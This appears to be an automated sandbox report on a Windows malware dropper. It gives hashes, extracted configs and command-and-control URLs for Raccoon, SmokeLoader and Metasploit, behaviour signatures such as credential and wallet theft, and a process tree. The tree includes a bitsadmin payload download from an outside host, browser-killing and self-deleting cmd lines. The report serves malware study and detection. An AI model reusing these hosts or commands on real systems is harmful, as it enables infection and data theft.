Analysis

  • max time kernel
    113s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    21-04-2021 06:37

General

  • Target

    783CA426AE369D17B2656FB1455E81D0.exe

  • Size

    380KB

  • MD5

    783ca426ae369d17b2656fb1455e81d0

  • SHA1

    89e96df6777b61df74fc1f842147c4c6fd014cc4

  • SHA256

    6bd5019594fbe81423f3f5c10c61773203914ebcc1d57dfab9bde6d8bc7b6c46

  • SHA512

    28bd1ad6e6abc4243cc9d5b61955984e26f9f5109a86b7e2c20668f5610e541abe4f13872135897d8ff5fe82ce8c912c9d18a4070032d3f9ac3ed441a45c0923

Malware Config

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 44 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 9 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 36 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 45 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2568
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2592
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2488
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2340
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2304
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1868
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1436
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1348
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1256
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1088
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:948
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:1008
                    • C:\Users\Admin\AppData\Local\Temp\783CA426AE369D17B2656FB1455E81D0.exe
                      "C:\Users\Admin\AppData\Local\Temp\783CA426AE369D17B2656FB1455E81D0.exe"
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1968
                      • C:\Users\Admin\AppData\Local\Temp\is-BF814.tmp\783CA426AE369D17B2656FB1455E81D0.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-BF814.tmp\783CA426AE369D17B2656FB1455E81D0.tmp" /SL5="$A0064,140559,56832,C:\Users\Admin\AppData\Local\Temp\783CA426AE369D17B2656FB1455E81D0.exe"
                        2⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:4032
                        • C:\Users\Admin\AppData\Local\Temp\is-1M16P.tmp\Ultra.exe
                          "C:\Users\Admin\AppData\Local\Temp\is-1M16P.tmp\Ultra.exe" /S /UID=instrx4
                          3⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2104
                          • C:\Program Files\7-Zip\CULZRZURYT\ultramediaburner.exe
                            "C:\Program Files\7-Zip\CULZRZURYT\ultramediaburner.exe" /VERYSILENT
                            4⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:3144
                            • C:\Users\Admin\AppData\Local\Temp\is-5BJ8M.tmp\ultramediaburner.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-5BJ8M.tmp\ultramediaburner.tmp" /SL5="$70058,281924,62464,C:\Program Files\7-Zip\CULZRZURYT\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Drops file in Program Files directory
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of WriteProcessMemory
                              PID:3220
                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                6⤵
                                • Executes dropped EXE
                                PID:816
                          • C:\Users\Admin\AppData\Local\Temp\8b-15337-5af-896ad-5cfb399205216\Rodaelesosha.exe
                            "C:\Users\Admin\AppData\Local\Temp\8b-15337-5af-896ad-5cfb399205216\Rodaelesosha.exe"
                            4⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1196
                          • C:\Users\Admin\AppData\Local\Temp\1f-20acd-650-6c297-2cc8fddc1360e\Hytelushyri.exe
                            "C:\Users\Admin\AppData\Local\Temp\1f-20acd-650-6c297-2cc8fddc1360e\Hytelushyri.exe"
                            4⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:3948
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ilxdkqpt.rxl\build.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4824
                              • C:\Users\Admin\AppData\Local\Temp\ilxdkqpt.rxl\build.exe
                                C:\Users\Admin\AppData\Local\Temp\ilxdkqpt.rxl\build.exe
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Checks processor information in registry
                                • Suspicious use of WriteProcessMemory
                                PID:4984
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\ilxdkqpt.rxl\build.exe" & del C:\ProgramData\*.dll & exit
                                  7⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:4380
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /im build.exe /f
                                    8⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4680
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 6
                                    8⤵
                                    • Delays execution with timeout.exe
                                    PID:5388
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sudqawfj.h3w\google-game.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:5980
                              • C:\Users\Admin\AppData\Local\Temp\sudqawfj.h3w\google-game.exe
                                C:\Users\Admin\AppData\Local\Temp\sudqawfj.h3w\google-game.exe
                                6⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Modifies registry class
                                • Suspicious use of SetWindowsHookEx
                                • Suspicious use of WriteProcessMemory
                                PID:1972
                                • C:\Windows\SysWOW64\rundll32.exe
                                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                  7⤵
                                  • Loads dropped DLL
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of WriteProcessMemory
                                  PID:4424
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1rlhilcz.x14\md8_8eus.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4280
                              • C:\Users\Admin\AppData\Local\Temp\1rlhilcz.x14\md8_8eus.exe
                                C:\Users\Admin\AppData\Local\Temp\1rlhilcz.x14\md8_8eus.exe
                                6⤵
                                • Executes dropped EXE
                                • Checks whether UAC is enabled
                                PID:6116
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3muyb00m.4fy\KiffApp2.exe & exit
                              5⤵
                                PID:5540
                                • C:\Users\Admin\AppData\Local\Temp\3muyb00m.4fy\KiffApp2.exe
                                  C:\Users\Admin\AppData\Local\Temp\3muyb00m.4fy\KiffApp2.exe
                                  6⤵
                                  • Executes dropped EXE
                                  PID:4748
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3psd5pyf.glm\gpooe.exe & exit
                                5⤵
                                  PID:3920
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2tsgz4of.oca\y1.exe & exit
                                  5⤵
                                    PID:5856
                                    • C:\Users\Admin\AppData\Local\Temp\2tsgz4of.oca\y1.exe
                                      C:\Users\Admin\AppData\Local\Temp\2tsgz4of.oca\y1.exe
                                      6⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:5776
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\2tsgz4of.oca\y1.exe"
                                        7⤵
                                          PID:4684
                                          • C:\Windows\SysWOW64\timeout.exe
                                            timeout /T 10 /NOBREAK
                                            8⤵
                                            • Delays execution with timeout.exe
                                            PID:6036
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\chfqsnnm.z1t\inst.exe & exit
                                      5⤵
                                        PID:5628
                                        • C:\Users\Admin\AppData\Local\Temp\chfqsnnm.z1t\inst.exe
                                          C:\Users\Admin\AppData\Local\Temp\chfqsnnm.z1t\inst.exe
                                          6⤵
                                          • Executes dropped EXE
                                          PID:2140
                                          • C:\Users\Admin\AppData\Local\Temp\cPcVPDYTjinGfPmSMD\frXLzv
                                            C:\Users\Admin\AppData\Local\Temp\cPcVPDYTjinGfPmSMD\frXLzv
                                            7⤵
                                            • Executes dropped EXE
                                            PID:5164
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ho0hlmtq.u25\toolspab2.exe & exit
                                        5⤵
                                          PID:5296
                                          • C:\Users\Admin\AppData\Local\Temp\ho0hlmtq.u25\toolspab2.exe
                                            C:\Users\Admin\AppData\Local\Temp\ho0hlmtq.u25\toolspab2.exe
                                            6⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:6092
                                            • C:\Users\Admin\AppData\Local\Temp\ho0hlmtq.u25\toolspab2.exe
                                              C:\Users\Admin\AppData\Local\Temp\ho0hlmtq.u25\toolspab2.exe
                                              7⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Checks SCSI registry key(s)
                                              • Suspicious behavior: MapViewOfSection
                                              PID:4152
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\feaofg25.mnw\askinstall31.exe & exit
                                          5⤵
                                            PID:4740
                                            • C:\Users\Admin\AppData\Local\Temp\feaofg25.mnw\askinstall31.exe
                                              C:\Users\Admin\AppData\Local\Temp\feaofg25.mnw\askinstall31.exe
                                              6⤵
                                              • Executes dropped EXE
                                              PID:4888
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c taskkill /f /im chrome.exe
                                                7⤵
                                                  PID:5600
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /f /im chrome.exe
                                                    8⤵
                                                    • Kills process with taskkill
                                                    PID:5420
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yifxfliw.dd1\SunLabsPlayer.exe /S & exit
                                              5⤵
                                                PID:5124
                                                • C:\Users\Admin\AppData\Local\Temp\yifxfliw.dd1\SunLabsPlayer.exe
                                                  C:\Users\Admin\AppData\Local\Temp\yifxfliw.dd1\SunLabsPlayer.exe /S
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Drops file in Program Files directory
                                                  PID:5940
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxA669.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:5540
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxA669.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:5608
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxA669.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:5704
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxA669.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:5832
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxA669.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:5772
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxA669.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:5724
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxA669.tmp\tempfile.ps1"
                                                                7⤵
                                                                • Checks for any installed AV software in registry
                                                                PID:4128
                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                7⤵
                                                                • Download via BitsAdmin
                                                                PID:1716
                                                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pVpjjPP5NbMmOrCq -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Drops file in Program Files directory
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:960
                                                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -puSsU5COHwUQb6o7 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:5192
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxA669.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:4712
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxA669.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:6028
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxA669.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:6124
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxA669.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:5992
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxA669.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:6076
                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\NYRmmlsGBPTI\NYRmmlsGBPTI.dll" NYRmmlsGBPTI
                                                                          7⤵
                                                                          • Loads dropped DLL
                                                                          PID:2280
                                                                          • C:\Windows\system32\rundll32.exe
                                                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\NYRmmlsGBPTI\NYRmmlsGBPTI.dll" NYRmmlsGBPTI
                                                                            8⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Drops file in System32 directory
                                                                            PID:5032
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxA669.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:6060
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxA669.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:2656
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxA669.tmp\tempfile.ps1"
                                                                              7⤵
                                                                                PID:5972
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxA669.tmp\tempfile.ps1"
                                                                                7⤵
                                                                                  PID:4844
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxA669.tmp\tempfile.ps1"
                                                                                  7⤵
                                                                                    PID:512
                                                                                  • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                    "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    PID:1584
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0bvu0qij.n1a\app.exe /8-2222 & exit
                                                                                5⤵
                                                                                  PID:5640
                                                                                  • C:\Users\Admin\AppData\Local\Temp\0bvu0qij.n1a\app.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\0bvu0qij.n1a\app.exe /8-2222
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5744
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 352
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:5872
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 392
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:5772
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 408
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:5296
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 648
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:5400
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 656
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:5228
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 692
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:5436
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 624
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:6108
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 588
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:5112
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 756
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:4512
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 728
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:5820
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 780
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:5464
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 740
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:5604
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 656
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:5736
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 732
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:1972
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 756
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:5304
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 700
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:3248
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 708
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:5328
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 736
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:4824
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 760
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:4620
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 708
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:660
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 656
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:5636
                                                                                    • C:\Users\Admin\AppData\Local\Temp\0bvu0qij.n1a\app.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\0bvu0qij.n1a\app.exe" /8-2222
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Modifies data under HKEY_USERS
                                                                                      PID:4372
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 316
                                                                                        8⤵
                                                                                        • Program crash
                                                                                        PID:5468
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 296
                                                                                        8⤵
                                                                                        • Program crash
                                                                                        PID:5968
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 332
                                                                                        8⤵
                                                                                        • Program crash
                                                                                        PID:5612
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 592
                                                                                        8⤵
                                                                                        • Program crash
                                                                                        PID:2248
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 668
                                                                                        8⤵
                                                                                        • Program crash
                                                                                        PID:5916
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 648
                                                                                        8⤵
                                                                                        • Program crash
                                                                                        PID:3896
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 556
                                                                                        8⤵
                                                                                        • Program crash
                                                                                        PID:5836
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 708
                                                                                        8⤵
                                                                                        • Program crash
                                                                                        PID:4824
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 744
                                                                                        8⤵
                                                                                        • Program crash
